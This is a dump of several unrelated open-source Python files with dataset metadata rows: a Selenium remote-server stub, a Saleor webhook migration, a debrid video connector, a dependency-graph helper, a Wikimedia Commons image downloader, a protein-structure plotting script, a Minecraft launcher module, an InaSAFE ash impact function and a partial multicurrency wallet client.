LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from core.lib.robotremoteserver import RobotRemoteServer
import bootstrap
from entities import *
import os
import sys
import subprocess
import platform
from log import Logger
class Selenium:
vmrunPath = None
log = Logger()
def __init__(self):
"""Also this doc should be in shown in library doc."""
def start(self):
p = subprocess.Popen(['java', '-jar', 'java/selenium-server-standalone-2.21.0.jar'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if __name__ == '__main__':
#RobotRemoteServer(Selenium(), *sys.argv[1:])
s = Selenium()
s.start() | bsd-3-clause | -7,281,574,944,637,975,000 | 36.551724 | 140 | 0.740376 | false | 4.329457 | false | false | false |
maferelo/saleor | saleor/webhook/migrations/0001_initial.py | 2 | 2186 | # Generated by Django 2.2.4 on 2019-09-26 05:47
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [("account", "0033_serviceaccount")]
operations = [
migrations.CreateModel(
name="Webhook",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("target_url", models.URLField(max_length=255)),
("is_active", models.BooleanField(default=True)),
("secret_key", models.CharField(blank=True, max_length=255, null=True)),
(
"service_account",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="webhooks",
to="account.ServiceAccount",
),
),
],
options={"permissions": (("manage_webhooks", "Manage webhooks"),)},
),
migrations.CreateModel(
name="WebhookEvent",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"event_type",
models.CharField(
db_index=True, max_length=128, verbose_name="Event type"
),
),
(
"webhook",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="events",
to="webhook.Webhook",
),
),
],
),
]
| bsd-3-clause | 366,458,658,504,562,050 | 31.147059 | 88 | 0.390668 | false | 5.619537 | false | false | false |
superberny70/pelisalacarta | python/main-classic/servers/debriders/alldebrid.py | 2 | 1902 | # -*- coding: utf-8 -*-
# ------------------------------------------------------------
# pelisalacarta - XBMC Plugin
# Conector para AllDebrid
# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/
# ------------------------------------------------------------
from core import jsontools
from core import logger
from core import scrapertools
# Returns an array of possible video url's from the page_url
def get_video_url(page_url, premium=False, user="", password="", video_password=""):
logger.info("(page_url='%s' , user='%s' , password='%s', video_password=%s)" % (
page_url, user, "**************************"[0:len(password)], video_password))
page_url = correct_url(page_url)
url = 'http://www.alldebrid.com/service.php?pseudo=%s&password=%s&link=%s&nb=0&json=true&pw=' % (
user, password, page_url)
data = jsontools.load_json(scrapertools.downloadpage(url))
video_urls = []
if data and data["link"] and not data["error"]:
extension = ".%s [alldebrid]" % data["filename"].rsplit(".", 1)[1]
video_urls.append([extension, data["link"]])
else:
try:
server_error = "Alldebrid: " + data["error"].decode("utf-8", "ignore")
server_error = server_error.replace("This link isn't available on the hoster website.",
"Enlace no disponible en el servidor de descarga") \
.replace("Hoster unsupported or under maintenance.",
"Servidor no soportado o en mantenimiento")
except:
server_error = "Alldebrid: Error en el usuario/password o en la web"
video_urls.append([server_error, ''])
return video_urls
def correct_url(url):
if "userporn.com" in url:
url = url.replace("/e/", "/video/")
if "putlocker" in url:
url = url.replace("/embed/", "/file/")
return url
| gpl-3.0 | -320,637,137,450,492,500 | 37.04 | 101 | 0.557308 | false | 3.729412 | false | false | false |
wavesaudio/instl | pyinstl/installItemGraph.py | 1 | 1347 | #!/usr/bin/env python3.9
import utils
from configVar import config_vars
try:
import networkx as nx
except ImportError as IE:
raise IE
def create_dependencies_graph(items_table):
retVal = nx.DiGraph()
for iid in items_table.get_all_iids():
for dependant in items_table.get_resolved_details_for_iid(iid, "depends"):
retVal.add_edge(iid, dependant)
return retVal
def create_inheritItem_graph(items_table):
retVal = nx.DiGraph()
for iid in items_table.get_all_iids():
for dependant in items_table.get_resolved_details_for_iid(iid, "inherit"):
retVal.add_edge(iid, dependant)
return retVal
def find_cycles(item_graph):
retVal = nx.simple_cycles(item_graph)
return retVal
def find_leaves(item_graph):
retVal = list()
for node in sorted(item_graph):
the_neighbors = item_graph.neighbors(node)
if not the_neighbors:
retVal.append(node)
return retVal
def find_needed_by(item_graph, node):
retVal = utils.set_with_order()
if node in item_graph:
predecessors = item_graph.predecessors(node)
for predecessor in predecessors:
if predecessor not in retVal:
retVal.append(predecessor)
retVal.extend(find_needed_by(item_graph, predecessor))
return retVal
| bsd-3-clause | 366,352,157,756,994,600 | 25.94 | 82 | 0.6585 | false | 3.544737 | false | false | false |
MartinThoma/algorithms | wiki-images-catpage/wikicommons.py | 1 | 8526 | #!/usr/bin/env python
"""Get all images of a wikipedia commons category."""
import json
import logging
import os
import sys
import urllib # images
import urllib2 # text
import xmltodict
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',
level=logging.DEBUG,
stream=sys.stdout)
def create_filelist(category):
"""
Create a list of files in a category.
Parameters
----------
category : string
Returns
-------
list
Examples
--------
>> wikicommons.create_filelist('Category:Unidentified Convolvulaceae')
"""
filelist = []
cats_to_explore = [category]
catsub = len("Category:")
visited_categories = []
while len(cats_to_explore) > 0:
sub_cat = cats_to_explore.pop() # Get next category
sub_filelist = get_direct_files(sub_cat) # Get direct members
for el in sub_filelist:
entry = {'filename': el['filename'],
'status': 'registered',
'category': os.path.join(category[catsub:],
el['category'][catsub:])}
filelist.append(entry)
# get subcategories
sub_categories = get_subcategories(sub_cat)
for el in sub_categories:
if el not in visited_categories:
cats_to_explore.append(el)
else:
logging.warning("Double category (%s)", sub_cat)
visited_categories.append(sub_cat)
logging.info("Done with sub_category '%s' (%i files), %i remaining",
sub_cat,
len(sub_filelist),
len(cats_to_explore))
return filelist
def download_filelist(category, file_path, pixels):
"""Download all files in filelist."""
if os.path.isfile(file_path):
with open(file_path) as data_file:
filelist = json.load(data_file)
else:
# File does not exist right now. Get data and create it.
logging.info("No file '%s' found. Get data.", file_path)
filelist = create_filelist(category)
logging.info("Got data for category '%s'. Write it to '%s'",
category,
file_path)
with open(file_path, 'w') as fp:
json.dump(filelist, fp, indent=2)
logging.info("The category '%s' has %i images.",
category,
len(filelist))
# Now load the images
logging.info("Start loading images for category '%s'", category)
for el in filelist:
if el['status'] != 'downloaded':
el['status'] = 'downloaded'
if not os.path.exists(el['category']):
os.makedirs(el['category'])
get_image(el['filename'],
pixels,
os.path.join(el['category'], el['filename']))
with open(file_path, 'w') as fp:
json.dump(filelist, fp, indent=2)
logging.info('Done loading files.')
def get_direct_files(category):
"""Get a list of all files in category."""
filelist = []
has_continue = True
data = {}
while has_continue:
base_url = "https://commons.wikimedia.org/w/api.php"
url = ("{base_url}?action=query&list=categorymembers&cmtype=file"
"&format=json"
"&cmtitle={category}"
.format(base_url=base_url,
category=urllib.quote_plus(category.encode('utf-8'))))
if 'continue' in data:
url += "&cmcontinue=%s" % data['continue']['cmcontinue']
response = urllib2.urlopen(url)
jsondata = response.read()
data = json.loads(jsondata)
for el in data['query']['categorymembers']:
filename = el['title'][len("File:"):]
filelist.append({'filename': filename,
'category': category})
has_continue = 'continue' in data
return filelist
def get_file_details(commons_name):
"""
Get categories and similar stuff from a single file.
Parameters
----------
commons_name : str
Returns
-------
dict
Examples
--------
>>> get_file_details('Aurelia-aurita-3.jpg')
"""
base_url = "https://tools.wmflabs.org/magnus-toolserver/commonsapi.php"
url = ("{base_url}?image={image}&thumbwidth={pixels}&thumbheight={pixels}"
.format(base_url=base_url,
image=urllib.quote_plus(commons_name.encode('utf-8')),
pixels=128))
while True:
try:
response = urllib2.urlopen(url)
except:
continue
break
xmldata = response.read()
xmldict = xmltodict.parse(xmldata)
return {'categories': xmldict['response']['categories']['category'],
'img_url': xmldict['response']['file']['urls']['thumbnail']}
def get_image(commons_name, pixels, local_filename):
"""
Get a single image from Wikipedia Commons.
Parameters
----------
commons_name : str
pixels : int
Maximum dimension for both width and height
local_filename : str
Path where the image gets saved.
Returns
-------
None
Examples
--------
>>> get_image('Aurelia-aurita-3.jpg', 250, 'local_name.jpg')
>>> get_image('Aurelia-aurita-3.jpg', 500, 'local_name_500.jpg')
"""
base_url = "https://tools.wmflabs.org/magnus-toolserver/commonsapi.php"
url = ("{base_url}?image={image}&thumbwidth={pixels}&thumbheight={pixels}"
.format(base_url=base_url,
image=urllib.quote_plus(commons_name.encode('utf-8')),
pixels=pixels))
response = urllib2.urlopen(url)
xmldata = response.read()
xmldict = xmltodict.parse(xmldata)
img_url = xmldict['response']['file']['urls']['thumbnail']
urllib.urlretrieve(img_url, local_filename)
def download_complete_category(category, pixels, local_folder='.'):
"""
Download all files of a category (recursive).
Parameters
----------
category : string
pixels : int
Maximum size of dimensions of image
Examples
--------
>>> download_complete_category("Category:Ipomoea", 128)
"""
directory = category[len("Category:"):]
store_here = os.path.join(local_folder, directory)
if not os.path.exists(store_here):
os.makedirs(store_here)
download_category_files(category, pixels, store_here)
sub_categories = get_subcategories(category)
for sub_cat in sub_categories:
download_complete_category(sub_cat, pixels, store_here)
def download_category_files(category, pixels, local_folder='.'):
"""
Download all files of a category (non-recursive).
Parameters
----------
category : string
pixels : int
Maximum size of dimensions of image
local_folder : string
Put files here.
Examples
--------
>> download_category_files("Category:Close-ups of Ipomoea flowers", 128)
"""
base_url = "https://commons.wikimedia.org/w/api.php"
url = ("{base_url}?action=query&list=categorymembers&cmtype=file"
"&format=json"
"&cmtitle={category}"
.format(base_url=base_url,
category=urllib.quote_plus(category.encode('utf-8'))))
response = urllib2.urlopen(url)
jsondata = response.read()
data = json.loads(jsondata)
for el in data['query']['categorymembers']:
filename = el['title'][len("File:"):]
logging.info(filename)
get_image(filename, pixels, os.path.join(local_folder, filename))
def get_subcategories(category):
"""
Get names of subcategories.
Parameters
----------
category : string
Returns
-------
list
Titles of all subcategories.
Examples
--------
>>> get_subcategories("Category:Ipomoea")[0]
u'Category:Close-ups of Ipomoea flowers'
"""
base_url = "https://commons.wikimedia.org/w/api.php"
url = ("{base_url}?action=query&list=categorymembers&cmtype=subcat"
"&format=json"
"&cmtitle={category}"
.format(base_url=base_url,
category=urllib.quote_plus(category.encode('utf-8'))))
response = urllib2.urlopen(url)
jsondata = response.read()
data = json.loads(jsondata)
cats = [el['title'] for el in data['query']['categorymembers']]
return cats
if __name__ == '__main__':
import doctest
doctest.testmod()
| mit | 1,034,184,928,926,527,400 | 29.55914 | 78 | 0.574478 | false | 3.943571 | false | false | false |
hmc-cs-rkretsch/Secondary-Protein-Structure | Program/lit_analysis.py | 1 | 11131 | # -*- coding: utf-8 -*-
"""
Author: Rachael Kretsch
Big Data Final Project
Secondary Protein Structure
analyse the literature data!!
"""
import pickle
import numpy as np
import matplotlib.pyplot as plt
from sklearn import linear_model
#==============================================================================
#
# struct_file = '../Data/color_fasta.txt' + "_struct_data.pik"
# with open(struct_file, 'rb') as f:
# structures, sequences = pickle.load(f)
#
# new_file = '../Data/color_fasta.txt' + "_seqs_data.pik"
# with open(new_file, 'rb') as f:
# sequences_2,seqids,names,descriptions = pickle.load(f)
#
# good_seqids=['1bfp','3ekh','3ned','4k3g','3cfc',
# '1xkh','2wht','4w6b','4xvp','3dqh',
# '1bgp','4q7t','4qgw','5h88','4l1s',
# '5h89','3s0f','4q9w','3rwt','5hzo']
#
# s2D_accuracies = {}
# s2D_accuracy = 0
#
# j=-1
#
# s2D_predictions = []
# for seqid in seqids:
# j+=1
# if seqid in good_seqids:
# struct = structures[j]
# i=0
# prediction = []
# for line in open('../Data/S2D/'+seqid + '_s2d_out.txt'):
# if line[0]!='>' and line[0]!='#':
# if i<11:
# pred = line[40]
# elif i<101:
# pred= line[41]
# else:
# pred = line[42]
# if pred=='H':
# prediction+=[1]
# elif pred=='E':
# prediction+=[-1]
# else:
# prediction+=[0]
# i+=1
# print(seqid)
# x = range(len(prediction))
# beta = []
# alpha = []
# coil = []
# for amino in prediction:
# if amino == -1:
# beta += [1]
# alpha += [0]
# coil += [0]
# elif amino == 1:
# beta += [0]
# alpha += [1]
# coil += [0]
# else:
# beta += [0]
# alpha += [0]
# coil += [1]
# plt.scatter(x,beta,label='beta',marker = 'o',color='blue')
# plt.scatter(x,coil,label='coil',marker='x', color='green')
# plt.scatter(x,alpha,label='alpha',color='red')
# plt.title('Secondary structure prediction s2D '+seqid)
# plt.xlabel('Amino acid position')
# plt.ylabel('Probability')
# lgd = plt.legend(bbox_to_anchor=(1.05, 1), loc=2)
# ax=plt.gca()
# fig = plt.gcf()
# fig.set_size_inches
# ax.set_xlim([0,len(prediction)])
# ax.set_ylim([0.9,1.1])
# plt.savefig('../Data/S2D/'+seqid+'_actual.png',bbox_extra_artists=(lgd,),dpi=600,bbox_inches='tight')
# plt.close()
# s2D_predictions+=[[beta,coil,alpha]]
# struct=struct[:len(prediction)]
# acc=(np.array(prediction)==np.array(struct)).sum()/len(prediction)
# s2D_accuracy+=acc
# s2D_accuracies[seqid]=acc
#
# s2D_accuracy=s2D_accuracy/len(good_seqids)
# print("accuracy s2D: "+str(s2D_accuracy))
#
#
# SOPM_accuracies = {}
# SOPM_accuracy = 0
#
# j=-1
#
# SOPM_predictions=[]
# for seqid in seqids:
# j+=1
# if seqid in good_seqids:
# struct = structures[j]
# prediction = []
# for line in open('../Data/SOPM/'+seqid + '.sopm.txt'):
# if line[0]in ['H','C','E'] and len(prediction)<len(struct):
# pred = line[0]
# if pred=='H':
# prediction+=[1]
# elif pred=='E':
# prediction+=[-1]
# else:
# prediction+=[0]
# print(seqid)
#
# x = range(len(prediction))
# beta = []
# alpha = []
# coil = []
# for amino in prediction:
# if amino == -1:
# beta += [1]
# alpha += [0]
# coil += [0]
# elif amino == 1:
# beta += [0]
# alpha += [1]
# coil += [0]
# else:
# beta += [0]
# alpha += [0]
# coil += [1]
# plt.scatter(x,beta,label='beta',marker = 'o',color='blue')
# plt.scatter(x,coil,label='coil',marker='x', color='green')
# plt.scatter(x,alpha,label='alpha',color='red')
# plt.title('Secondary structure prediction SOPM '+seqid)
# plt.xlabel('Amino acid position')
# plt.ylabel('Probability')
# lgd = plt.legend(bbox_to_anchor=(1.05, 1), loc=2)
# ax=plt.gca()
# fig = plt.gcf()
# fig.set_size_inches
# ax.set_xlim([0,len(prediction)])
# ax.set_ylim([0.9,1.1])
# plt.savefig('../Data/SOPM/'+seqid+'_actual.png',bbox_extra_artists=(lgd,),dpi=600,bbox_inches='tight')
# plt.close()
#
# SOPM_predictions+=[[beta,coil,alpha]]
# struct=struct[:len(prediction)]
# acc=(np.array(prediction)==np.array(struct)).sum()/len(prediction)
# SOPM_accuracy+=acc
# SOPM_accuracies[seqid]=acc
#
# SOPM_accuracy=SOPM_accuracy/len(good_seqids)
# print("accuracy SOPM: "+str(SOPM_accuracy))
# GOR4_accuracies = {}
# GOR4_accuracy = 0
#
# j=-1
#
# GOR4_predictions = []
# for seqid in seqids:
# j+=1
# if seqid in good_seqids:
# struct = structures[j]
# prediction = []
# for line in open('../Data/GORIV/'+seqid + '.gor4.mpsa.txt'):
# if line[0]in ['H','C','E'] and len(prediction)<len(struct):
# pred = line[0]
# if pred=='H':
# prediction+=[1]
# elif pred=='E':
# prediction+=[-1]
# else:
# prediction+=[0]
# print(seqid)
#
# x = range(len(prediction))
# beta = []
# alpha = []
# coil = []
# for amino in prediction:
# if amino == -1:
# beta += [1]
# alpha += [0]
# coil += [0]
# elif amino == 1:
# beta += [0]
# alpha += [1]
# coil += [0]
# else:
# beta += [0]
# alpha += [0]
# coil += [1]
# plt.scatter(x,beta,label='beta',marker = 'o',color='blue')
# plt.scatter(x,coil,label='coil',marker='x', color='green')
# plt.scatter(x,alpha,label='alpha',color='red')
# plt.title('Secondary structure prediction GOR4 '+seqid)
# plt.xlabel('Amino acid position')
# plt.ylabel('Probability')
# lgd = plt.legend(bbox_to_anchor=(1.05, 1), loc=2)
# ax=plt.gca()
# fig = plt.gcf()
# fig.set_size_inches
# ax.set_xlim([0,len(prediction)])
# ax.set_ylim([0.9,1.1])
# plt.savefig('../Data/GORIV/'+seqid+'_actual.png',bbox_extra_artists=(lgd,),dpi=600,bbox_inches='tight')
# plt.close()
#
# GOR4_predictions+=[[beta,coil,alpha]]
# struct=struct[:len(prediction)]
# acc=(np.array(prediction)==np.array(struct)).sum()/len(prediction)
# GOR4_accuracy+=acc
# GOR4_accuracies[seqid]=acc
#
# GOR4_accuracy=GOR4_accuracy/len(good_seqids)
# print("accuracy GORIV: "+str(GOR4_accuracy))
#
#
# data_file = '../Data/color_fasta.txt' + "_data.pik"
# with open(data_file, 'rb') as f:
# data = pickle.load(f)
#
# np.random.shuffle(data)
#
# data_test, data_train = data[:len(data)/4,:], data[len(data)/4:,:]
#
# x_train = data_train[:,1:]
# y_train = data_train[:,:1]
# x_test = data_test[:,1:]
# y_test = data_test[:,:1]
#
#
# logreg = linear_model.LogisticRegression(C=3.4)
# logreg.fit(x_train,y_train)
# data_file = '../Data/color_fasta.txt' + "_data.pik"
# with open(data_file, 'rb') as f:
# data_full = pickle.load(f)
#
# x_full = data_full[:,1:]
# y_full = data_full[:,:1]
# result_full = logreg.predict(x_full)
#
#
#==============================================================================
j=-1
i=0
k=-1
for seqid in seqids:
j+=1
if seqid in good_seqids:
k+=1
x = range(len(structures[j]))
beta_real =[]
alpha_real = []
coil_real = []
for amino in structures[j]:
if amino == -1:
beta_real += [1]
alpha_real += [0]
coil_real += [0]
elif amino == 1:
beta_real += [0]
alpha_real += [1]
coil_real += [0]
else:
beta_real += [0]
alpha_real += [0]
coil_real += [1]
plt.scatter(x,beta_real,label='beta_real',marker = 'o',color='blue')
plt.scatter(x,coil_real,label='coil_real',marker='x', color='green')
plt.scatter(x,alpha_real,label='alpha_real',color='red')
log_ = result_full[i:i+len(sequences[j])]
beta_log =[]
alpha_log = []
coil_log = []
for amino in log_:
if amino == -1:
beta_log += [0.9]
alpha_log += [0]
coil_log += [0]
elif amino == 1:
beta_log += [0]
alpha_log += [0.9]
coil_log += [0]
else:
beta_log += [0]
alpha_log += [0]
coil_log += [0.9]
plt.scatter(x,beta_log,label='beta_log',marker = 'o',color='blue')
plt.scatter(x,coil_log,label='coil_log',marker='x', color='green')
plt.scatter(x,alpha_log,label='alpha_log',color='red')
GOR4 = np.array(GOR4_predictions[k])*0.8
x = range(len(GOR4[0]))
plt.scatter(x,GOR4[0],label='beta_GOR4',marker = 'o',color='blue')
plt.scatter(x,GOR4[1],label='coil_GOR4',marker='x', color='green')
plt.scatter(x,GOR4[2],label='alpha_GOR4',color='red')
SOPM = np.array(SOPM_predictions[k])*0.7
x = range(len(SOPM[0]))
plt.scatter(x,SOPM[0],label='beta_SOPM',marker = 'o',color='blue')
plt.scatter(x,SOPM[1],label='coil_SOPM',marker='x', color='green')
plt.scatter(x,SOPM[2],label='alpha_SOPM',color='red')
s2D = np.array(s2D_predictions[k])*0.6
x = range(len(s2D[0]))
plt.scatter(x,s2D[0],label='beta_s2D',marker = 'o',color='blue')
plt.scatter(x,s2D[1],label='coil_s2D',marker='x', color='green')
plt.scatter(x,s2D[2],label='alpha_s2D',color='red')
plt.title('Secondary structure prediction '+seqid)
plt.xlabel('Amino acid position')
plt.ylabel('Probability')
lgd = plt.legend(bbox_to_anchor=(1.05, 1), loc=2)
ax=plt.gca()
fig = plt.gcf()
fig.set_size_inches
ax.set_xlim([0,len(x)])
ax.set_ylim([0.5,1.1])
plt.savefig('../Data/'+seqid+'.png',bbox_extra_artists=(lgd,),dpi=600,bbox_inches='tight')
plt.close()
i+=len(sequences[j])
| mit | 8,593,575,227,235,875,000 | 31.931953 | 113 | 0.465008 | false | 3.00027 | false | false | false |
LambolAlee/LAminec | cli_module/Kaminec/jsontools/promotions/GamePromotions.py | 1 | 1431 | from string import Template
from collections import namedtuple
from ..LibItem import make_comp_items
from ..system import Rule, getStartCodeTemplate, NATIVEKEY
ORDLIBFORM = "{0}/{1}/{2}/{1}-{2}.jar"
NATIVELIBFORM = "{0}/{1}/{2}/{1}-{2}-{3}.jar"
class MCPromotNormal:
'''promotion to minecraft 1.12.2 and earlier.'''
def __init__(self, version):
self.version = version
@property
def version(self):
return self._version
@version.setter
def version(self, version):
self._version = version
def initLibs(self, lib_data, conf, include_native=False):
return make_comp_items(lib_data, conf=conf, include_native=include_native)
def initMcArgs(self, args_data):
return Template(args_data)
def initStartCode(self):
return Template(getStartCodeTemplate())
class MCPromotForge(MCPromotNormal):
def __init__(self, version):
super(MCPromotForge, self).__init__(version)
#sign:change it into the form which is the same as initlib
def initForgeLibs(self, forge_lib_data):
forge_list = []
for forge_lib in forge_lib_data:
package, name, version = forge_lib["name"].split(':')
ord_forge_lib = ORDLIBFORM.format(package.replace('.', '/'), name, version)
forge_list.append(ord_forge_lib)
return forge_list
def initMcArgs(self, args_data):
return Template(args_data) | gpl-3.0 | 5,770,173,840,983,619,000 | 30.130435 | 87 | 0.649196 | false | 3.533333 | false | false | false |
easmetz/inasafe | safe/impact_functions/ash/ash_raster_places/impact_function.py | 1 | 9377 | # coding=utf-8
"""InaSAFE Disaster risk tool by Australian Aid - Tsunami Raster Impact on
Buildings
Contact : ole.moller.nielsen@gmail.com
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
import logging
from safe.impact_functions.ash.ash_raster_places.metadata_definitions import \
AshRasterHazardPlacesFunctionMetadata
from safe.impact_functions.bases.continuous_rh_classified_ve import \
ContinuousRHClassifiedVE
from safe.storage.vector import Vector
from safe.common.exceptions import KeywordNotFoundError
from safe.utilities.i18n import tr
from safe.utilities.utilities import main_type
from safe.engine.interpolation import assign_hazard_values_to_exposure_data
from safe.impact_reports.place_exposure_report_mixin import (
PlaceExposureReportMixin)
__author__ = 'etienne'
__project_name__ = 'inasafe-dev'
__filename__ = 'impact_function.py'
__date__ = '7/13/16'
__copyright__ = 'etienne@kartoza.com'
LOGGER = logging.getLogger('InaSAFE')
class AshRasterPlaceFunction(
ContinuousRHClassifiedVE,
PlaceExposureReportMixin):
# noinspection PyUnresolvedReferences
"""Inundation raster impact on building data."""
_metadata = AshRasterHazardPlacesFunctionMetadata()
def __init__(self):
"""Constructor (calls ctor of base class)."""
super(AshRasterPlaceFunction, self).__init__()
PlaceExposureReportMixin.__init__(self)
self.hazard_classes = [
tr('Very Low'),
tr('Low'),
tr('Moderate'),
tr('High'),
tr('Very High'),
]
self.no_data_warning = False
def notes(self):
"""Return the notes section of the report.
:return: The notes that should be attached to this impact report.
:rtype: list
"""
# Range for ash hazard
group_parameters = self.parameters['group_threshold']
unaffected_max = group_parameters.value_map[
'unaffected_threshold']
very_low_max = group_parameters.value_map['very_low_threshold']
low_max = group_parameters.value_map['low_threshold']
medium_max = group_parameters.value_map['moderate_threshold']
high_max = group_parameters.value_map['high_threshold']
fields = [
tr('Dry zone is defined as non-inundated area or has inundation '
'depth is 0 %s') % low_max.unit.abbreviation,
tr('Very Low ash hazard zone is defined as ash depth is '
'more than %s %s but less than %.1f %s') % (
unaffected_max,
unaffected_max.unit.abbreviation,
very_low_max.value,
very_low_max.unit.abbreviation),
tr('Low ash hazard zone is defined as ash depth is '
'more than %s %s but less than %.1f %s') % (
very_low_max,
very_low_max.unit.abbreviation,
low_max.value,
low_max.unit.abbreviation),
tr('Medium tsunami hazard zone is defined as ash depth '
'is more than %.1f %s but less than %.1f %s') % (
low_max.value,
low_max.unit.abbreviation,
medium_max.value,
medium_max.unit.abbreviation),
tr('High tsunami hazard zone is defined as ash depth is '
'more than %.1f %s but less than %.1f %s') % (
medium_max.value,
medium_max.unit.abbreviation,
high_max.value,
high_max.unit.abbreviation),
tr('Very high tsunami hazard zone is defined as ash depth '
'is more than %.1f %s') % (
high_max.value, high_max.unit.abbreviation)
]
# include any generic exposure specific notes from definitions.py
fields = fields + self.exposure_notes()
# include any generic hazard specific notes from definitions.py
fields = fields + self.hazard_notes()
return fields
def run(self):
"""Tsunami raster impact to buildings (e.g. from Open Street Map)."""
# Range for ash hazard
group_parameters = self.parameters['group_threshold']
unaffected_max = group_parameters.value_map[
'unaffected_threshold'].value
very_low_max = group_parameters.value_map['very_low_threshold'].value
low_max = group_parameters.value_map['low_threshold'].value
medium_max = group_parameters.value_map['moderate_threshold'].value
high_max = group_parameters.value_map['high_threshold'].value
# Interpolate hazard level to building locations
interpolated_layer = assign_hazard_values_to_exposure_data(
self.hazard.layer,
self.exposure.layer,
attribute_name=self.target_field)
# Extract relevant exposure data
features = interpolated_layer.get_data()
total_features = len(interpolated_layer)
try:
population_field = self.exposure.keyword('population_field')
except KeywordNotFoundError:
population_field = None
# required for real time
self.exposure.keyword('name_field')
structure_class_field = self.exposure.keyword('structure_class_field')
exposure_value_mapping = self.exposure.keyword('value_mapping')
self.init_report_var(self.hazard_classes)
for i in range(total_features):
# Get the interpolated depth
ash_hazard_zone = float(features[i][self.target_field])
if ash_hazard_zone <= unaffected_max:
current_hash_zone = 0 # not affected
elif unaffected_max < ash_hazard_zone <= very_low_max:
current_hash_zone = 1 # very low
elif very_low_max < ash_hazard_zone <= low_max:
current_hash_zone = 2 # low
elif low_max < ash_hazard_zone <= medium_max:
current_hash_zone = 2 # medium
elif medium_max < ash_hazard_zone <= high_max:
current_hash_zone = 3 # high
elif high_max < ash_hazard_zone:
current_hash_zone = 4 # very high
# If not a number or a value beside real number.
else:
current_hash_zone = 0
usage = features[i].get(structure_class_field, None)
usage = main_type(usage, exposure_value_mapping)
# Add calculated impact to existing attributes
features[i][self.target_field] = current_hash_zone
category = self.hazard_classes[current_hash_zone]
if population_field is not None:
population = float(features[i][population_field])
else:
population = 1
self.classify_feature(category, usage, population, True)
self.reorder_dictionaries()
style_classes = [
dict(
label=self.hazard_classes[0] + ': >%.1f - %.1f cm' % (
unaffected_max, very_low_max),
value=0,
colour='#00FF00',
transparency=0,
size=1
),
dict(
label=self.hazard_classes[1] + ': >%.1f - %.1f cm' % (
very_low_max, low_max),
value=1,
colour='#FFFF00',
transparency=0,
size=1
),
dict(
label=self.hazard_classes[2] + ': >%.1f - %.1f cm' % (
low_max, medium_max),
value=2,
colour='#FFB700',
transparency=0,
size=1
),
dict(
label=self.hazard_classes[3] + ': >%.1f - %.1f cm' % (
medium_max, high_max),
value=3,
colour='#FF6F00',
transparency=0,
size=1
),
dict(
label=self.hazard_classes[4] + ': <%.1f cm' % high_max,
value=4,
colour='#FF0000',
transparency=0,
size=1
),
]
style_info = dict(
target_field=self.target_field,
style_classes=style_classes,
style_type='categorizedSymbol')
impact_data = self.generate_data()
extra_keywords = {
'target_field': self.target_field,
'map_title': self.metadata().key('map_title'),
'legend_title': self.metadata().key('legend_title'),
'legend_units': self.metadata().key('legend_units'),
}
impact_layer_keywords = self.generate_impact_keywords(extra_keywords)
impact_layer = Vector(
data=features,
projection=interpolated_layer.get_projection(),
geometry=interpolated_layer.get_geometry(),
name=self.metadata().key('layer_name'),
keywords=impact_layer_keywords,
style_info=style_info)
impact_layer.impact_data = impact_data
self._impact = impact_layer
return impact_layer
| gpl-3.0 | -7,679,573,764,815,955,000 | 36.658635 | 78 | 0.569798 | false | 4.059307 | false | false | false |
FreedomCoop/valuenetwork | multicurrency/utils.py | 1 | 11766 | import requests
import time
import hashlib
import hmac
import logging
import json
from random import randint
from base64 import b64decode
from django.conf import settings
from django.forms import ValidationError
class ChipChapAuthError(Exception):
def __init__(self, message, errors):
super(ChipChapAuthError, self).__init__(message)
self.errors = errors
class ChipChapAuthConnection(object):
def __init__(self):
self.logger = self.init_logger()
if 'client_id' in settings.MULTICURRENCY:
self.able_to_connect = True
cdata = settings.MULTICURRENCY
self.client_id = cdata['client_id']
self.client_secret = cdata['client_secret']
self.access_key = cdata['access_key']
self.access_secret = cdata['access_secret']
self.url_new_user = cdata['url_new_user']
self.url_client = cdata['url_client']
self.url_history = cdata['url_history']
self.url_balance = cdata['url_balance']
if not hasattr(cdata, 'ocp_api_key'):
self.ocp_api_key = None
#raise ValidationError("Is needed the API key given by BotC wallet to this platform (settings).")
print("WARN: Multiwallet Read-Only! To make payments is needed the API key given by OCP to the BotC wallet platform (in local_settings).")
self.logger.error("WARN: Multiwallet Read-Only! To make payments is needed the API key given by OCP to the BotC wallet platform (in local_settings).")
else:
self.ocp_api_key = cdata['ocp_api_key']
self.logger.info("Connected with an OCP api-key for safe access.")
if not hasattr(cdata, "url_w2w"):
self.url_w2w = None
print("WARN: Multiwallet without W2W permissions! Can't let users pay the shares...")
self.logger.error("WARN: Multiwallet without W2W permissions! Can't let users pay the shares...")
else:
self.url_w2w = cdata['url_w2w']
if not "url_ticker" in cdata:
self.url_ticker = None
print("WARN: Multicurrency without Ticker! Can't process crypto prices (except faircoin)")
self.logger.error("WARN: Multicurrency without Ticker! Can't process crypto prices (except faircoin)")
else:
self.url_ticker = cdata['url_ticker']
#if not "url_tx_json" in cdata:
# self.url_tx_json = None
